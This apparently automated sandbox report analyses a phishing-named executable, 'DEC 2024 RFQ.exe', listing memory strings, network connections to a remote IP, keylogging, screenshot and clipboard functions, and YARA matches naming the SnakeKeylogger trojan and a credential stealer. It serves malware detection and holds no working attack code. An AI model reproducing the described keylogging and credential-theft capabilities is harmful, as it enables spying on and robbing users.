                  Source: DEC 2024 RFQ.exe, 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: RegSvcs.exe, 00000001.00000002.4150184054.0000000002CAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.175
                  Source: RegSvcs.exe, 00000001.00000002.4150184054.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002CAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.175$
                  Source: RegSvcs.exe, 00000001.00000002.4151891799.0000000003FD8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003EB5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D86000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002D39000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D5E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                  Source: RegSvcs.exe, 00000001.00000002.4151891799.0000000003EBB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003CEC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D17000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003FB3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003E90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                  Source: RegSvcs.exe, 00000001.00000002.4151891799.0000000003FD8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003EB5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D86000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002D39000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D5E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                  Source: RegSvcs.exe, 00000001.00000002.4151891799.0000000003EBB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003CEC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D17000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003FB3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003E90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                  Source: RegSvcs.exe, 00000001.00000002.4150184054.0000000002E24000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002D39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: RegSvcs.exe, 00000001.00000002.4150184054.0000000002E1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49753 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to capture screen (.Net source)
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                  Contains functionality to log keystrokes (.Net Source)
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_00094164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00094164
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_00094164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00094164
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_00093F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00093F66
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0008001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0008001C
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_000ACABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_000ACABC

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: Process Memory Space: DEC 2024 RFQ.exe PID: 7492, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: RegSvcs.exe PID: 7508, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Binary is likely a compiled AutoIt script file
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: This is a third-party compiled AutoIt script.0_2_00023B3A
                  Source: DEC 2024 RFQ.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: DEC 2024 RFQ.exe, 00000000.00000000.1663536679.00000000000D4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_51e85504-5
                  Source: DEC 2024 RFQ.exe, 00000000.00000000.1663536679.00000000000D4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_c31cbf44-e
                  Source: DEC 2024 RFQ.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_af6da635-b
                  Source: DEC 2024 RFQ.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_dd332d0a-4
                  Initial sample is a PE file and has a suspicious name
                  Source: initial sampleStatic PE information: Filename: DEC 2024 RFQ.exe
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0008A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0008A1EF
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_00078310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00078310
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_000851BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_000851BD
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0004D9750_2_0004D975
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_000421C50_2_000421C5
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_000562D20_2_000562D2
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_000A03DA0_2_000A03DA
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0005242E0_2_0005242E
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_000425FA0_2_000425FA
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0007E6160_2_0007E616
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0002E6A00_2_0002E6A0
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_000366E10_2_000366E1
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0005878F0_2_0005878F
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_000388080_2_00038808
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_000568440_2_00056844
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_000A08570_2_000A0857
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_000888890_2_00088889
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0004CB210_2_0004CB21
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_00056DB60_2_00056DB6
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_00036F9E0_2_00036F9E
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_000330300_2_00033030
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_000431870_2_00043187
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0004F1D90_2_0004F1D9
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_000212870_2_00021287
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_000414840_2_00041484
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_000355200_2_00035520
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_000476960_2_00047696
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_000357600_2_00035760
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_000419780_2_00041978
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_00059AB50_2_00059AB5
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0002FCE00_2_0002FCE0
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_00041D900_2_00041D90
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0004BDA60_2_0004BDA6
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_000A7DDB0_2_000A7DDB
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0002DF000_2_0002DF00
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_00033FE00_2_00033FE0
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0173C8200_2_0173C820
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E9C19A1_2_00E9C19A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E9D2781_2_00E9D278
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E953621_2_00E95362
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E9C4681_2_00E9C468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E9C7381_2_00E9C738
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E969A01_2_00E969A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E9E9881_2_00E9E988
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E9CA081_2_00E9CA08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E9CCD81_2_00E9CCD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E99DE01_2_00E99DE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E96FC81_2_00E96FC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E9CFAA1_2_00E9CFAA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E9F6311_2_00E9F631
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E9E97A1_2_00E9E97A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E9FA881_2_00E9FA88
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E93E091_2_00E93E09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06581E801_2_06581E80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_065817A01_2_065817A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06589C701_2_06589C70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_065895481_2_06589548
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06580B301_2_06580B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_065850281_2_06585028
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_065829681_2_06582968
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06581E701_2_06581E70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0658DE001_2_0658DE00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0658E6B01_2_0658E6B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0658E6AF1_2_0658E6AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0658E6A01_2_0658E6A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0658EF511_2_0658EF51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0658EF601_2_0658EF60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0658178F1_2_0658178F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0658FC5E1_2_0658FC5E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0658FC681_2_0658FC68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06589C6D1_2_06589C6D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0658CCA01_2_0658CCA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0658D5501_2_0658D550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0658D5401_2_0658D540
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0658DDFF1_2_0658DDFF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0658DDF11_2_0658DDF1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0658E2581_2_0658E258
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0658E24A1_2_0658E24A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0658EAF81_2_0658EAF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0658EB081_2_0658EB08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_065893281_2_06589328
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06580B201_2_06580B20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06588B901_2_06588B90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0658F3B81_2_0658F3B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06588BA01_2_06588BA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_065800401_2_06580040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_065850181_2_06585018
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0658F8101_2_0658F810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_065800171_2_06580017
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0658F8021_2_0658F802
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0658D0F81_2_0658D0F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0658295B1_2_0658295B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0658D9991_2_0658D999
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0658D9A81_2_0658D9A8
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: String function: 00027DE1 appears 35 times
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: String function: 00040AE3 appears 70 times
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: String function: 00048900 appears 42 times
                  Source: DEC 2024 RFQ.exe, 00000000.00000003.1677993607.0000000004213000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DEC 2024 RFQ.exe
                  Source: DEC 2024 RFQ.exe, 00000000.00000003.1678149007.00000000043BD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DEC 2024 RFQ.exe
                  Source: DEC 2024 RFQ.exe, 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs DEC 2024 RFQ.exe
                  Source: DEC 2024 RFQ.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
